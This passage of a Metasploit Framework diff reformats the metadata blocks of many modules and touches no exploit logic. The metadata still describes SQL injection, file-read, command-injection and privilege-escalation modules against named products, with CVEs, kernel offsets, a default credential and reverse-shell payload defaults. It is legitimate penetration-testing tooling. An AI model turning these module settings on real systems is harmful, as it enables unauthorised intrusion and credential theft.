+          ['URL', 'https://plugins.trac.wordpress.org/changeset/2413885']
+        ],
         'Actions' => [
           ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
         ],

--- a/modules/auxiliary/scanner/http/wp_chopslider_id_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_chopslider_id_sqli.rb
@@ -22,19 +22,17 @@ class MetasploitModule < Msf::Auxiliary
           parameters, and thus must be encoded,
           and magic_quotes is applied at the server.
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            'SunCSR', # edb module
-            'Callum Murphy <callum.a.murphy.77@gmail.com>' # full disclosure
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'SunCSR', # edb module
+          'Callum Murphy <callum.a.murphy.77@gmail.com>' # full disclosure
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['EDB', '48457'],
-            ['CVE', '2020-11530'],
-            ['URL', 'https://seclists.org/fulldisclosure/2020/May/26']
-          ],
+        'References' => [
+          ['EDB', '48457'],
+          ['CVE', '2020-11530'],
+          ['URL', 'https://seclists.org/fulldisclosure/2020/May/26']
+        ],
         'Actions' => [
           ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
         ],

--- a/modules/auxiliary/scanner/http/wp_duplicator_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_duplicator_file_read.rb
@@ -18,17 +18,15 @@ class MetasploitModule < Msf::Auxiliary
           'Duplicator' version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges.
           This vulnerability was being actively exploited when it was discovered.
         },
-        'References' =>
-          [
-            ['CVE', '2020-11738'],
-            ['WPVDB', '10078'],
-            ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
-          ],
-        'Author' =>
-          [
-            'Ramuel Gall', # Vulnerability discovery
-            'Hoa Nguyen - SunCSR Team' # Metasploit module
-          ],
+        'References' => [
+          ['CVE', '2020-11738'],
+          ['WPVDB', '10078'],
+          ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
+        ],
+        'Author' => [
+          'Ramuel Gall', # Vulnerability discovery
+          'Hoa Nguyen - SunCSR Team' # Metasploit module
+        ],
         'DisclosureDate' => '2020-02-19',
         'License' => MSF_LICENSE
       )

--- a/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
+++ b/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
@@ -20,20 +20,18 @@ class MetasploitModule < Msf::Auxiliary
           Combining these items, it's possible to request a password reset for an account, then view the debug file to determine
           the link that was emailed out, and reset the user's password.
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            # this was an 0day
-          ],
+        'Author' => [
+          'h00die', # msf module
+          # this was an 0day
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['URL', 'https://wordpress.org/support/topic/security-issue-with-debug-log/'],
-            ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/'],
-            ['URL', 'https://plugins.trac.wordpress.org/changeset/2432768/easy-wp-smtp'],
-            ['WPVDB', '10494'],
-            ['CVE', '2020-35234']
-          ],
+        'References' => [
+          ['URL', 'https://wordpress.org/support/topic/security-issue-with-debug-log/'],
+          ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/2432768/easy-wp-smtp'],
+          ['WPVDB', '10494'],
+          ['CVE', '2020-35234']
+        ],
         'DisclosureDate' => '2020-12-06'
       )
     )

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -18,19 +18,17 @@ class MetasploitModule < Msf::Auxiliary
           Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
           versions before 4.3.1.  The hash parameter is vulnerable to injection.
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            'red0xff', # sqli libs in msf
-            'Wordfence' # blog post says team, no individual(s) called out for discovery
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'red0xff', # sqli libs in msf
+          'Wordfence' # blog post says team, no individual(s) called out for discovery
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'EDB', '48699' ],
-            [ 'CVE', '2019-20361' ],
-            [ 'URL', 'https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/' ]
-          ],
+        'References' => [
+          [ 'EDB', '48699' ],
+          [ 'CVE', '2019-20361' ],
+          [ 'URL', 'https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/' ]
+        ],
         'Actions' => [
           ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
         ],

--- a/modules/auxiliary/scanner/http/wp_learnpress_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_learnpress_sqli.rb
@@ -20,21 +20,19 @@ class MetasploitModule < Msf::Auxiliary
           prior to 3.2.6.8 is affected by an authenticated SQL injection via the
           current_items parameter of the post-new.php page.
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Omri Herscovici', # Discovery and PoC
-            'Sagi Tzadik', # Discovery and PoC
-            'nhattruong' # edb poc
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Omri Herscovici', # Discovery and PoC
+          'Sagi Tzadik', # Discovery and PoC
+          'nhattruong' # edb poc
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2020-6010'],
-            ['URL', 'https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/'],
-            ['EDB', '50137'],
-            ['WPVDB', '10208']
-          ],
+        'References' => [
+          ['CVE', '2020-6010'],
+          ['URL', 'https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/'],
+          ['EDB', '50137'],
+          ['WPVDB', '10208']
+        ],
         'Actions' => [
           ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
         ],

--- a/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
@@ -19,20 +19,18 @@ class MetasploitModule < Msf::Auxiliary
           versions before 1.6.4.  The vulnerable parameter is in the log parameter.
           Wordpress has forced updates of the plugin to all servers
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            'red0xff', # sqli help
-            'mslavco' # discovery
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'red0xff', # sqli help
+          'mslavco' # discovery
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['URL', 'https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/'],
-            ['CVE', '2020-27615'],
-            ['URL', 'https://loginizer.com/blog/loginizer-1-6-4-security-fix/'],
-            ['URL', 'https://twitter.com/mslavco/status/1318877097184604161']
-          ],
+        'References' => [
+          ['URL', 'https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/'],
+          ['CVE', '2020-27615'],
+          ['URL', 'https://loginizer.com/blog/loginizer-1-6-4-security-fix/'],
+          ['URL', 'https://twitter.com/mslavco/status/1318877097184604161']
+        ],
         'Actions' => [
           ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
         ],

--- a/modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb
+++ b/modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb
@@ -21,18 +21,16 @@ class MetasploitModule < Msf::Auxiliary
           read to retrieve the last backup file.  That backup is then downloaded, and any sql
           files will be parsed looking for the wp_users INSERT statement to grab user creds.
         },
-        'References' =>
-          [
-            ['EDB', '49252'],
-            ['WPVDB', '10502'],
-            ['WPVDB', '10503'],
-            ['URL', 'https://plugins.trac.wordpress.org/changeset/2439376/boldgrid-backup']
-          ],
-        'Author' =>
-          [
-            'Wadeek', # Vulnerability discovery
-            'h00die' # Metasploit module
-          ],
+        'References' => [
+          ['EDB', '49252'],
+          ['WPVDB', '10502'],
+          ['WPVDB', '10503'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/2439376/boldgrid-backup']
+        ],
+        'Author' => [
+          'Wadeek', # Vulnerability discovery
+          'h00die' # Metasploit module
+        ],
         'DisclosureDate' => '2020-12-12',
         'License' => MSF_LICENSE
       )

--- a/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
+++ b/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
@@ -19,15 +19,13 @@ class MetasploitModule < Msf::Auxiliary
           parameter which allows a malicious actor to load arbitrary file path.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Basim Alabdullah', # Vulnerability discovery
-            'Dhiraj Mishra'     # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '48308']
-          ],
+        'Author' => [
+          'Basim Alabdullah', # Vulnerability discovery
+          'Dhiraj Mishra'     # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '48308']
+        ],
         'DisclosureDate' => '2020-04-10'
       )
     )

--- a/modules/auxiliary/scanner/sage/x3_adxsrv_login.rb
+++ b/modules/auxiliary/scanner/sage/x3_adxsrv_login.rb
@@ -26,10 +26,9 @@ class MetasploitModule < Msf::Auxiliary
       },
       'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk
       'License' => MSF_LICENSE,
-      'References' =>
-        [
-          ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
-        ]
+      'References' => [
+        ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
+      ]
       )
 
     register_options(

--- a/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb
+++ b/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb
@@ -20,13 +20,11 @@ class MetasploitModule < Msf::Auxiliary
           published by Modicon (now Schneider Electric) in 1979 for use with its
           programmable logic controllers (PLCs).
         },
-        'Author' =>
-        [
+        'Author' => [
           'Juan Escobar <juan[at]null-life.com>', # @itsecurityco
           'Ezequiel Fernandez' # @capitan_alfa
         ],
-        'References' =>
-        [
+        'References' => [
           [ 'URL', 'https://modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf' ],
           [ 'URL', 'https://en.wikipedia.org/wiki/Modbus#Modbus_TCP_frame_format_(primarily_used_on_Ethernet_networks)' ],
           [ 'URL', 'https://github.com/industrialarmy/Hello_Proto' ],

--- a/modules/auxiliary/server/socks_proxy.rb
+++ b/modules/auxiliary/server/socks_proxy.rb
@@ -14,14 +14,12 @@ class MetasploitModule < Msf::Auxiliary
       },
       'Author' => [ 'sf', 'Spencer McIntyre', 'surefire' ],
       'License' => MSF_LICENSE,
-      'Actions' =>
-        [
-          [ 'Proxy', { 'Description' => 'Run a SOCKS proxy server' } ]
-        ],
-      'PassiveActions' =>
-        [
-          'Proxy'
-        ],
+      'Actions' => [
+        [ 'Proxy', { 'Description' => 'Run a SOCKS proxy server' } ]
+      ],
+      'PassiveActions' => [
+        'Proxy'
+      ],
       'DefaultAction' => 'Proxy'
     )
 

--- a/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
+++ b/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
@@ -23,18 +23,16 @@ class MetasploitModule < Msf::Auxiliary
           preventing successful exploitation.
           Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.
         },
-        'Author' =>
-          [
-            'Jeffrey Hofmann <me@jeffs.sh>', # Vuln discovery, PoC, etc
-            'h00die' # msf module
-          ],
+        'Author' => [
+          'Jeffrey Hofmann <me@jeffs.sh>', # Vuln discovery, PoC, etc
+          'h00die' # msf module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
-            [ 'CVE', '2020-13699' ],
-            [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
-          ],
+        'References' => [
+          [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
+          [ 'CVE', '2020-13699' ],
+          [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
+        ],
         'Notes' => {
           'SideEffects' => [IOC_IN_LOGS]
         }

--- a/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
+++ b/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
@@ -25,22 +25,19 @@ class MetasploitModule < Msf::Auxiliary
           or edit database informations.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'M3@ZionLab from DBAppSecurity',
-            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2019-13373'],
-            ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/']
-          ],
-        'Actions' =>
-          [
-            [ 'SQLI_DUMP', { 'Description' => 'Retrieve all the data from the database' } ],
-            [ 'ADD_ADMIN', { 'Description' => 'Add an administrator user' } ],
-            [ 'REMOVE_ADMIN', { 'Description' => 'Remove an administrator user' } ]
-          ],
+        'Author' => [
+          'M3@ZionLab from DBAppSecurity',
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2019-13373'],
+          ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/']
+        ],
+        'Actions' => [
+          [ 'SQLI_DUMP', { 'Description' => 'Retrieve all the data from the database' } ],
+          [ 'ADD_ADMIN', { 'Description' => 'Add an administrator user' } ],
+          [ 'REMOVE_ADMIN', { 'Description' => 'Remove an administrator user' } ]
+        ],
         'DefaultOptions' => { 'SSL' => true },
         'DefaultAction' => 'SQLI_DUMP',
         'DisclosureDate' => '2019-07-06'

--- a/modules/evasion/windows/process_herpaderping.rb
+++ b/modules/evasion/windows/process_herpaderping.rb
@@ -42,14 +42,12 @@ class MetasploitModule < Msf::Evasion
 
           The source code is based on Johnny Shaw's PoC (https://github.com/jxy-s/herpaderping).
         },
-        'Author' =>
-        [
+        'Author' => [
           'Johnny Shaw', # Research and PoC
           'Christophe De La Fuente' # MSF Module
         ],
         'License' => MSF_LICENSE,
-        'References' =>
-        [
+        'References' => [
           [ 'URL', 'https://jxy-s.github.io/herpaderping/' ],
           [ 'URL', 'https://github.com/jxy-s/herpaderping' ],
         ],

--- a/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
+++ b/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
@@ -36,80 +36,75 @@ class MetasploitModule < Msf::Exploit::Local
           FreeBSD 12.1-RELEASE r354233 (amd64).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Andy Nguyen', # @theflow0 - discovery and exploit
-            'bcoles' # metasploit
-          ],
+        'Author' => [
+          'Andy Nguyen', # @theflow0 - discovery and exploit
+          'bcoles' # metasploit
+        ],
         'DisclosureDate' => '2020-07-07',
         'Platform' => ['bsd'], # FreeBSD
         'Arch' => [ARCH_X64],
         'SessionTypes' => ['shell'],
-        'References' =>
+        'References' => [
+          ['CVE', '2020-7457'],
+          ['EDB', '48644'],
+          ['PACKETSTORM', '158341'],
+          ['URL', 'https://hackerone.com/reports/826026'],
+          ['URL', 'https://bsdsec.net/articles/freebsd-announce-freebsd-security-advisory-freebsd-sa-20-20-ipv6'],
+          ['URL', 'https://www.freebsd.org/security/patches/SA-20:20/ipv6.patch'],
+          ['URL', 'https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_var.h'],
+          ['URL', 'https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_output.c']
+        ],
+        'Targets' => [
           [
-            ['CVE', '2020-7457'],
-            ['EDB', '48644'],
-            ['PACKETSTORM', '158341'],
-            ['URL', 'https://hackerone.com/reports/826026'],
-            ['URL', 'https://bsdsec.net/articles/freebsd-announce-freebsd-security-advisory-freebsd-sa-20-20-ipv6'],
-            ['URL', 'https://www.freebsd.org/security/patches/SA-20:20/ipv6.patch'],
-            ['URL', 'https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_var.h'],
-            ['URL', 'https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_output.c']
+            'Automatic',
+            {}
           ],
-        'Targets' =>
           [
-            [
-              'Automatic',
-              {}
-            ],
-            [
-              'FreeBSD 9.0-RELEASE #0',
-              {
-                allproc: '0xf01e40'
-              }
-            ],
-            [
-              'FreeBSD 9.1-RELEASE #0 r243825',
-              {
-                allproc: '0x1028880'
-              }
-            ],
-            [
-              'FreeBSD 9.2-RELEASE #0 r255898',
-              {
-                allproc: '0x11c9ba0'
-              }
-            ],
-            [
-              'FreeBSD 9.3-RELEASE #0 r268512',
-              {
-                allproc: '0x1295800'
-              }
-            ],
-            [
-              'FreeBSD 12.0-RELEASE r341666',
-              {
-                allproc: '0x1df3c38'
-              }
-            ],
-            [
-              'FreeBSD 12.1-RELEASE r354233',
-              {
-                allproc: '0x1df7648'
-              }
-            ],
+            'FreeBSD 9.0-RELEASE #0',
+            {
+              allproc: '0xf01e40'
+            }
           ],
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
-            'PrependFork' => true,
-            'WfsDelay' => 10
-          },
-        'Notes' =>
-          {
-            'Stability' => [CRASH_OS_RESTARTS],
-            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
-          },
+          [
+            'FreeBSD 9.1-RELEASE #0 r243825',
+            {
+              allproc: '0x1028880'
+            }
+          ],
+          [
+            'FreeBSD 9.2-RELEASE #0 r255898',
+            {
+              allproc: '0x11c9ba0'
+            }
+          ],
+          [
+            'FreeBSD 9.3-RELEASE #0 r268512',
+            {
+              allproc: '0x1295800'
+            }
+          ],
+          [
+            'FreeBSD 12.0-RELEASE r341666',
+            {
+              allproc: '0x1df3c38'
+            }
+          ],
+          [
+            'FreeBSD 12.1-RELEASE r354233',
+            {
+              allproc: '0x1df7648'
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
+          'PrependFork' => true,
+          'WfsDelay' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        },
         'DefaultTarget' => 0
       )
     )

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -34,23 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote
           7.03, and 7.07.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Christophe De La Fuente', # MSF module
-            'Felipe Molina' # original PoC
-          ],
-        'References' =>
-          [
-            [ 'EDB', '48856' ],
-            [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
-            [ 'CVE', '2020-11698']
-          ],
+        'Author' => [
+          'Christophe De La Fuente', # MSF module
+          'Felipe Molina' # original PoC
+        ],
+        'References' => [
+          [ 'EDB', '48856' ],
+          [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
+          [ 'CVE', '2020-11698']
+        ],
         'CmdStagerFlavor' => %i[fetch wget curl],
         'Payload' => {
           'DisableNops' => true
         },
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Unix In-Memory',
             {

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -20,24 +20,21 @@ class MetasploitModule < Msf::Exploit::Remote
           remote system.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Max0x4141', # discovery
-            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-17505'], # RCE
-            ['CVE', '2020-17506'], # Auth bypass
-            ['EDB', '48744'],
-            ['PACKETSTORM', '158868'],
-            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
-          ],
-        'DefaultOptions' =>
-          {
-            'SSL' => true,
-            'RPort' => 9000
-          },
+        'Author' => [
+          'Max0x4141', # discovery
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2020-17505'], # RCE
+          ['CVE', '2020-17506'], # Auth bypass
+          ['EDB', '48744'],
+          ['PACKETSTORM', '158868'],
+          ['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
+        ],
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPort' => 9000
+        },
         'Platform' => %w[unix linux],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [

--- a/modules/exploits/linux/http/cayin_cms_ntp.rb
+++ b/modules/exploits/linux/http/cayin_cms_ntp.rb
@@ -24,27 +24,24 @@ class MetasploitModule < Msf::Exploit::Remote
           Results in root level access.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            [ 'EDB', '48553' ],
-            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
-            [ 'CVE', '2020-7357' ]
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
+        ],
+        'References' => [
+          [ 'EDB', '48553' ],
+          [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
+          [ 'CVE', '2020-7357' ]
+        ],
         'Platform' => ['linux'],
         'DefaultOptions' => {
           'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
         },
         'Privileged' => true,
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-06-04',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -18,43 +18,39 @@ class MetasploitModule < Msf::Exploit::Remote
           Some DLINK Access Points are vulnerable to an authenticated OS command injection.
           Default credentials for the web interface are admin/admin.
         },
-        'Author' =>
-          [
-            'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
-            'Nick Starke' # Metasploit Module
-          ],
+        'Author' => [
+          'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
+          'Nick Starke' # Metasploit Module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'CVE', '2019-20499' ],
-            [ 'EDB', '46841' ]
-          ],
+        'References' => [
+          [ 'CVE', '2019-20499' ],
+          [ 'EDB', '46841' ]
+        ],
         'DisclosureDate' => '2019-05-15',
         'Privileged' => true,
         'Platform' => %w[linux unix],
-        'Payload' =>
-          {
-            'DisableNops' => true,
-            'BadChars' => "\x00"
-          },
+        'Payload' => {
+          'DisableNops' => true,
+          'BadChars' => "\x00"
+        },
         'CmdStagerFlavor' => :wget,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'CMD',
-              {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix'
-              }
-            ],
-            [
-              'Linux mips Payload',
-              {
-                'Arch' => ARCH_MIPSLE,
-                'Platform' => 'linux'
-              }
-            ],
+            'CMD',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix'
+            }
           ],
+          [
+            'Linux mips Payload',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
+            }
+          ],
+        ],
         'DefaultTarget' => 1
       )
     )

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -22,18 +22,16 @@ class MetasploitModule < Msf::Exploit::Remote
           Successful exploitation results in remote code execution as the root user.
         },
 
-        'Author' =>
-          [
-            'Davy Douhine' # ddouhine
-          ],
+        'Author' => [
+          'Davy Douhine' # ddouhine
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'CVE', '2020-16205' ],
-            [ 'URL', 'http://geutebruck.com' ],
-            [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ],
-            [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ]
-          ],
+        'References' => [
+          [ 'CVE', '2020-16205' ],
+          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ],
+          [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ]
+        ],
         'DisclosureDate' => '2020-05-20',
         'Privileged' => true,
         'Platform' => ['unix', 'linux'],
@@ -42,10 +40,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Automatic Target', {} ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' =>
-         {
-           'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
-         }
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+        }
       )
     )
 

--- a/modules/exploits/linux/http/gravcms_exec.rb
+++ b/modules/exploits/linux/http/gravcms_exec.rb
@@ -27,24 +27,21 @@ class MetasploitModule < Msf::Exploit::Remote
           under the context of the web-server user.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
-          ],
-        'References' =>
-          [
-            ['CVE', '2021-21425'],
-            ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
-          ],
+        'Author' => [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+        'References' => [
+          ['CVE', '2021-21425'],
+          ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
+        ],
         'Privileged' => true,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'DefaultOptions' =>
-          {
-            'payload' => 'php/meterpreter/reverse_tcp',
-            'Encoder' => 'php/base64',
-            'WfsDelay' => 90
-          },
+        'DefaultOptions' => {
+          'payload' => 'php/meterpreter/reverse_tcp',
+          'Encoder' => 'php/base64',
+          'WfsDelay' => 90
+        },
         'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2021-03-29',
         'DefaultTarget' => 0,

--- a/modules/exploits/linux/http/ibm_drm_rce.rb
+++ b/modules/exploits/linux/http/ibm_drm_rce.rb
@@ -24,33 +24,29 @@ class MetasploitModule < Msf::Exploit::Remote
           The authentication bypass works on versions <= 2.0.6.1, but the command injection should only work on
           versions <= 2.0.4 according to IBM.
         },
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
-          ],
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'CVE', '2020-4427' ], # auth bypass
-            [ 'CVE', '2020-4428' ], # command injection
-            [ 'CVE', '2020-4429' ], # insecure default password
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
-            [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/' ]
-          ],
+        'References' => [
+          [ 'CVE', '2020-4427' ], # auth bypass
+          [ 'CVE', '2020-4428' ], # command injection
+          [ 'CVE', '2020-4429' ], # insecure default password
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/' ]
+        ],
         'Platform' => 'linux',
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Targets' =>
-          [
-            [ 'IBM Data Risk Manager <= 2.0.4', {} ]
-          ],
+        'Targets' => [
+          [ 'IBM Data Risk Manager <= 2.0.4', {} ]
+        ],
         'Privileged' => true,
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 15,
-            'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
-            'SSL' => true
-          },
+        'DefaultOptions' => {
+          'WfsDelay' => 15,
+          'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
+          'SSL' => true
+        },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-04-21'
       )

--- a/modules/exploits/linux/http/ipfire_pakfire_exec.rb
+++ b/modules/exploits/linux/http/ipfire_pakfire_exec.rb
@@ -21,35 +21,32 @@ class MetasploitModule < Msf::Exploit::Remote
           and prior to execute arbitrary code as the root user.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development
